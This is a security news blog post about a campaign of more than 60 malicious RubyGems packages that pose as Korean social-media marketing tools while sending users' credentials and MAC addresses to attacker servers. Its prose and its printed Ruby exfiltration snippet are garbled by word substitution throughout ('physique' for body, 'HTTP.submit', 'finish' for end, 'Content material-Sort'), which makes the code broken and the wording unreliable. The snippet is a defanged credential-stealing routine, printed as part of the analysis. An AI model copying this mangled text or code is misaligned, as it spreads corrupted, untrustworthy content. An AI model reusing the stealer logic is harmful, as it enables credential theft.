Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

RubyGems Malware Attack Weaponizes 60+ Packages to Steal Credentials from Social Media and Marketing Tools

Posted on August 8, 2025August 8, 2025 By CWS

Risk actors started slipping malicious code into official RubyGems packages, disguising infostealers as social media automation instruments in early 2023.

Over the previous two years, attackers working underneath aliases reminiscent of zon, nowon, kwonsoonje, and soonje have printed greater than 60 gems that ship promised automation options—bulk posting, engagement amplification, and backlink creation—whereas covertly harvesting credentials.

These packages goal platforms together with Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver, and have been downloaded over 275,000 instances, with installs persisting on machines lengthy after particular person gems are faraway from the general public index.

Socket.dev analysts famous that every malicious gem incorporates a light-weight graphical interface constructed with Glimmer-DSL-LibUI, introduced in Korean to enchantment to South Korean grey-hat entrepreneurs.

Upon launch, customers encounter prompts labeled “아이디” (ID) and “비밀번호” (password), encouraging entry of account credentials underneath the guise of official login for automation companies.

As a substitute of forwarding these particulars to official APIs, the gems instantly exfiltrate credentials and host MAC addresses to attacker-controlled servers by way of HTTP POST requests.

The domains programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr, and seven1.iwinv[.]web host PHP bulletin board endpoints that silently settle for stolen knowledge.

The marketing campaign’s evolution demonstrates a classy provide chain compromise. Gems printed underneath the zon alias are sometimes “yanked”—faraway from RubyGems—inside days, solely to be mirrored in steady integration caches and redistributed underneath new names by the identical actor.

Screenshot from marketingduo[.]co[.]kr displaying Korean-language interface for bulk messaging instruments (Supply – Socket.dev)

Regardless of periodic infrastructure shifts, the core credential-stealing routine stays unchanged, enabling persistent fingerprinting of contaminated hosts.

This method leverages grey-hat entrepreneurs’ reliance on disposable accounts; victims not often report breaches, opting as an alternative to desert compromised identities and proceed operations with out suspicion.

An infection Mechanism and Exfiltration Workflow

The malicious iuz-64bit gem exemplifies the an infection mechanism shared throughout the cluster.

After presenting its GUI, the gem invokes a perform that collects consumer enter and system identifiers earlier than performing an HTTP POST to the attacker’s C2 endpoint.

The defanged Ruby snippet beneath illustrates the method:-

def login_check2(user_id, user_pw)
url=” # C2 endpoint
headers = { ‘Content material-Sort’ => ‘utility/json’ }
mac = get_mac_address()
physique = {
username: user_id,
password: user_pw,
macAddress: mac,
program: ‘인스타 자동 포스팅(업로드) 프로그램’
}.to_json
response = HTTP.submit(url, headers: headers, physique: physique)
payload = JSON.parse(response.physique.to_s)
payload[‘status’] == “0” ? “0” : payload[‘message’]
finish

Annotated code snippet from iuz-64bit gem illustrating credential exfiltration (Supply – Socket.dev)

As soon as credentials and MAC addresses attain the C2 server, the attacker can correlate installations throughout varied gem clusters, monitor device distribution, and preserve long-term entry.

This dual-use mannequin empowers grey-hat entrepreneurs to automate spam and search engine marketing campaigns whereas surreptitiously funneling delicate knowledge to the menace actor.

Because the marketing campaign persists, defenders should combine real-time dependency scanning and install-time alerts to detect and block these malicious packages earlier than they infiltrate growth environments.

Equip your SOC with full entry to the newest menace knowledge from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial

Cyber Security News Tags:Attack, Credentials, Malware, Marketing, Media, Packages, RubyGems, Social, Steal, Tools, Weaponizes

Post navigation

Previous Post: Columbia University Data Breach Impacts 860,000
Next Post: RubyGems, PyPI Hit by Malicious Packages Stealing Credentials, Crypto, Forcing Security Changes

Related Posts

Authorities Dismantled AVCheck, a Tool For Testing Malware Against Antivirus Detection Cyber Security News
Gunra Ransomware Group Leaks 40TB of Data from American Hospital Cyber Security News
A New Tool that Automates GitHub Device Code Phishing Attack Cyber Security News
Quantum Threats Preparing Your Encryption Strategy Cyber Security News
Preventing Phishing Attacks on Cryptocurrency Exchanges Cyber Security News
Palo Alto Networks GlobalProtect Vulnerability Allows Root User Privilege Escalation Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • VexTrio TDS System Developing Several Malicious Apps Mimic as VPNs to Publish in Google Play and App Store
  • Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ for Enterprise
  • CodeSecCon 2025: Where Software Security’s Next Chapter Unfolds
  • AI Tools Fuel Brazilian Phishing Scam While Efimer Trojan Steals Crypto from 5,000 Victims
  • Help Desk at Risk: Scattered Spider Shines Light on Overlook Threat Vector

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • VexTrio TDS System Developing Several Malicious Apps Mimic as VPNs to Publish in Google Play and App Store
  • Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ for Enterprise
  • CodeSecCon 2025: Where Software Security’s Next Chapter Unfolds
  • AI Tools Fuel Brazilian Phishing Scam While Efimer Trojan Steals Crypto from 5,000 Victims
  • Help Desk at Risk: Scattered Spider Shines Light on Overlook Threat Vector

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News